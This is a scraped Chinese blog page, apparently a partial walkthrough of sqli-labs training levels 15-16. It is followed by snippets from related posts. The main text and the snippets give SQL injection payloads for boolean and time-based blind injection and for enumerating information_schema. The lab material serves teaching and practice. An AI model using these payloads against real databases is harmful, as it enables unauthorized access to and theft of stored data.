SQL注入：sqli-labs靶场通关（第十五关——第二十关）

最新推荐文章于 2025-01-02 08:57:31 发布

Lspecialnx_

最新推荐文章于 2025-01-02 08:57:31 发布

阅读量962

点赞数 17

CC 4.0 BY-SA版权

文章标签：数据库 oracle

本文链接：https://blog.youkuaiyun.com/l258282/article/details/144464003

第十五关（布尔盲注）

1.判断注入类型

使用1 or 1=1 和 1 or 1=2发现页面正常。

1 or 1=1

1 or 1=2

输入1’发现并没有报错，输入1"发现也没有报错。

1'

1"

这次连闭合报错的信息都没有了，所以不能用报错注入了。这里可以用布尔盲注或时间盲注。

2.查询数据库名称

1' and ascii(substr((database()),1,1))=115#

1.判断注入类型

使用1 or 1=1 和 1 or 1=2发现页面正常。

1 or 1=1

1 or 1=2

输入1’发现并没有报错，输入1"发现也没有报错。

1'

1"

这次连闭合报错的信息都没有了，所以不能用报错注入了。这里可以用布尔盲注或时间盲注。

2.查询数据库名称

1' and ascii(substr((database()),1,1))=115#

第十六关（布尔盲注）

1.查看本关源码

通过源码可以猜测本关的闭合方式为 ")

2.判断注入点

1") or 1=1#

1") or 1=2#

可以进一步验证注入点为 ")

3.猜数据库长度

1") or length(database())>7#

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Lspecialnx_

关注关注

17
点赞
踩
21

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sqli-labs靶场15-19过关小记

xtx4506的博客

04-17

2812

level-15 首先判断是否有sql注入攻击，先输入万能密码’ or 1=1# 试了试发现登录成功可以看到是存在sql注入的，输入单引号后不报错，推断可能是盲注，分析一下源码可以看到报错信息是被注释的，所以可以采用布尔型或时间型盲注，因为我个人比较喜欢使用时间型盲注，所以可以一步一步推断出数据库，表，字段然后一个一个爆字段就好啦，因为我这边已经知道库名，如果不知道的话可以使用ascii码一步一步缩小范围确定字符 payload:' and if(substr((select g

SQL注入：sqli-labs靶场通关（第十二关）

l258282的博客

12-07

369

免责声明：工具本身并无好坏，希望大家以遵守《网络安全法》相关法律为前提来使用该工具，支持研究学习，切勿用于非法犯罪活动，对于恶意使用该工具造成的损失，和本人及开发者无关。

参与评论您还未登录，请先登录后发表或查看评论

SQL注入靶场（16-20关）

2401_88387979的博客

12-11

1078

通过源码可以猜测本关的闭合方式为 ")

sql注入第15关

qq_45751902的博客

03-15

744

闭合符号 465 'or 1=1# 查看数据库名 -1 'or if(length(database())=8,sleep(2),1)# -1' or if((ascii(substr((database()),1,1)))=115,sleep(2),1)# 查看表名 -1' or if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1

sqli-labs第十五关详细教程

ppkr_itt的博客

10-29

502

Dumb' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(5),1) #查询列名。爆破一下，1-101 2-109 3- 97 4-105 5-108 6-115 emalis第一个表。第一列内容为angelina。页面睡眠了，用时间盲注。

sqli-labs关卡15(基于post提交的单引号布尔盲注)通关思路

zyh1588的博客

11-11

1736

小白回顾sql靶场第15关

sqli-labs靶场第十五关

gou1791241251的博客

12-27

1075

第十五关没什么特殊的，只是单引号闭合而已。

SQL注入：sqli-labs靶场通关（1-5关）

kobelnfn的博客

12-27

1177

我的sqli-labs靶场学习经验分享

sqli-labs注入完全手册：sqli-labs全关卡通关详解与技巧总结

最新发布

02-24

sqli-labs是一款流行的学习SQL注入技术的靶场平台，它包含多个关卡，旨在帮助信息安全从业者和爱好者通过实战练习掌握SQL注入的原理与技巧。本书《sqli-labs注入完全手册：sqli-labs全关卡通关详解与技巧总结》提供...

SQL注入：sqli-labs靶场通关（6-10关）

kobelnfn的博客

01-02

879

1）如果是phpstudy在安装路径下的Extensions目录中相应数据库版本中的my.ini数据库配置文件中修改或者添加secure_file_priv=‘’2）数据库配置文件配置项secure_file_priv=‘’，（数据库默认是secure_file_priv=‘NULL’）只有在前半部分正确的情况下才会执行后半部分，即只有前面闭合正确后半部分才能执行函数**sleep(5)**延时，否则不会执行。手动逐个字符判断security数据库中数据表的名称，以第一个字符为例子，后续以此类推。

sql注入15-19

m0_65614852的博客

04-25

681

15 15关源码次关输入点在username和passwd框并且关闭了回显，只能用时间盲注来爆出数据库。首先测试闭合方式，使你添加在后面的代码能够正确执行这里我用” ’or 1=1 # “ 时间盲注用 if 来判断数据库名称，payload： if(ascii(substr(database(),1,1)),null,sleep(5))=112# 16 查看16关源码发现与15关不同的地方就是闭合方式不同闭合方式: “) 17 ...

sql-labs靶场第二十关测试报告

ccc_9wy的博客

10-21

2296

sql-labs第二十关的测试报告；手工注入和sqlmap两种方法；靶场源代码分析；详细过程；报错注入；sqlmap注入；cookie注入。

表单注入——sqli-labs第11~16关

这是笔者初学时所做的笔记，有错误的地方太多了，有些结论也只是笔者的一家之言。请自行判断

07-28

1860

1、观察是post还是get 可以看url的变化，或者看源码 xxxx’ order by 10# ’ order by 2#

sql第(18~20)关

m0_73639338的博客

12-13

645

我们再次查看源码将我们要写的代码替换掉 uagent 发现我们在后面加上 and ' 就可以使 sql 语句执行成功，这时我们再到 bp 中继续爆破。我们在页面中的账号密码框中输入 admin ，然后打开 bp 开始抓包，我们抓点击登录按钮后的页面。然后我们 CTRL+R 将抓到的内容发入重放器，然后我们打开重放器，点击发送，在右面打开页面渲染。这时我们输入注释符发现还是报错，这时我们去查看靶场源码，找到我们插入代码的地方。我们发现页面报错了这时我们还是使用报错注入来获取数据库的名字。

Sql-labs 靶场（20-30）

Ee_CN的博客

09-24

619

语法：http://127.0.0.1/sql/Less-26/?id=0')%a0UniOn%a0SeleCt%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'%a0or('语法：http://127.0.0.1/sql/Less-27/?

sql注入16-20

qq_45751902的博客

03-31

1833

16-20关的解释，新手的那些疑问

sqli-labs第11~16关【post型:union,报错注入，盲注】

学海无涯苦作舟

09-14

327

第11关单引号闭合型-----id='$id' 之前的10关都是get型，参数会显示在url中，post则需要借助工具，burp或者hackbar等等 1.先对内容进行输入抓包发现有两个参数 2.我们可以猜测一下表中的uname是否有admin 发现我们输入的and 1=1 and 1=2被代入到数据库中执行且存在admin账户（如果admin不存在我们构造payload：x' or 1=1 --+和x' or 1=2 --+进行测试，x可以是任意值），如下 3.接下来就是ord..

sql注入靶场闯关Basic（16-20关POST型）详细版

Zqinglele的博客

04-19

1168

1.使用特殊符号报错，发现没有回显2.通过尝试发现是使用 ") 闭合。

sqli-labs 15-19通关

weixin_52029251的博客

04-18

270

sqli 不管输入什么都没有回显查看源码发现报错语句都被注释掉了，抓包使用延时注入试试发送之后十秒之后才给回应，明显注入成功。第十六关和第十五关大同小异，只不过是闭合方式不同闭合方式") 第十七关还是输入什么都没有回显，查看源码从源码可以看出只能从passwd注入对password注入发现回显之后使用updatexml（）进行注入就可以了第十八关这关将username和password都进行了过滤，查看源码之后发现有user..